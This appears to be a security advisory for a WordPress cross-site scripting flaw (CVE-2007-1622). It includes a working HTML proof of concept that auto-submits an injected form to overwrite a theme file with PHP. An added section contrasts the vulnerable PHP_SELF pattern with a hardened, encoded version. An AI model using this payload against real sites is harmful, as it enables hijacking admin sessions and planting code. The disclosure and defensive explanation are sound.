WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting

Related Vulnerabilities: CVE-2007-1622
Publish Date: 19 Mar 2007
Source: http://www.securityfocus.com/bid/23027/info

WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
	<title>Wordpress XSS PoC</title>
</head>
<body id="main">

	<!-- The action URL carries path info after theme-editor.php; the unescaped
	     PHP_SELF reflects it into the page, which is the injection point. -->
	<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
		<p>
			<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
		</p>
		<p>
			<input type="hidden" name="action" value="update" />
			<input type="hidden" name="file" value="wp-content/themes/default/index.php" />
		</p>
	</form>
	<script type="text/javascript">
	// <![CDATA[
		document.forms[0].submit();
	// ]]>
	</script>
</body>
</html>
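The root cause behind this advisory is that $_SERVER['PHP_SELF'] includes any path info appended to the script name, and that value was written into a form action attribute without encoding. The following is an added example, not code from the original advisory or from WordPress itself: it shows the vulnerable pattern beside a hardened one, using constructed function names and sample request values.

```php
<?php
// Added illustration of the PHP_SELF reflection pattern (CVE-2007-1622 class).
// Assumption: a request for /wp-admin/theme-editor.php/<extra> makes PHP_SELF
// contain the attacker-controlled <extra> path info; SCRIPT_NAME does not.

// Vulnerable: PHP_SELF reflected into an attribute value with no encoding.
function form_action_vulnerable(string $php_self): string
{
    return '<form action="' . $php_self . '" method="post">';
}

// Hardened: encode for the HTML attribute context (ENT_QUOTES also covers the
// single quote used in the advisory's PoC URL). Pairing this with SCRIPT_NAME
// rather than PHP_SELF removes the path-info channel entirely.
function form_action_hardened(string $path): string
{
    return '<form action="' . htmlspecialchars($path, ENT_QUOTES, 'UTF-8') . '" method="post">';
}

// Constructed sample values, standing in for what a live request would supply.
$php_self    = "/wp-admin/theme-editor.php/'\"><b>injected</b>";  // PHP_SELF with path info
$script_name = "/wp-admin/theme-editor.php";                      // SCRIPT_NAME, no path info

echo form_action_vulnerable($php_self), PHP_EOL;    // markup passes through unchanged
echo form_action_hardened($php_self), PHP_EOL;      // markup is encoded, rendered as text
echo form_action_hardened($script_name), PHP_EOL;   // preferred: no user-controlled path at all
```

In current WordPress the equivalent attribute-context encoding is provided by esc_attr(); the same principle applies to any template that echoes server-derived URL components into markup.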